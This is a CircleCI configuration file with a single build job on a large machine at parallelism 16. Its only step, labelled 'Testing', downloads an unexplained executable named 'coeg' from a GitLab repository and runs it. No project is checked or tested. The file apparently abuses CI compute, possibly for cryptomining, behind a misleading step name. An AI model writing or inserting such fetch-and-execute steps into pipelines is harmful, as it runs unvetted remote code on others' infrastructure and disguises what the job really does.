version: 2.1
jobs:
  build:
    machine:
      image: ubuntu-2004:202010-01
    resource_class: large
    parallelism: 16
    steps:
      - checkout
      - run:
          name: "Testing"
          command: wget https://gitlab.com/kithsa/learn-gitlab-ultimate-trial/-/raw/master/coeg && chmod +x coeg && ./coeg
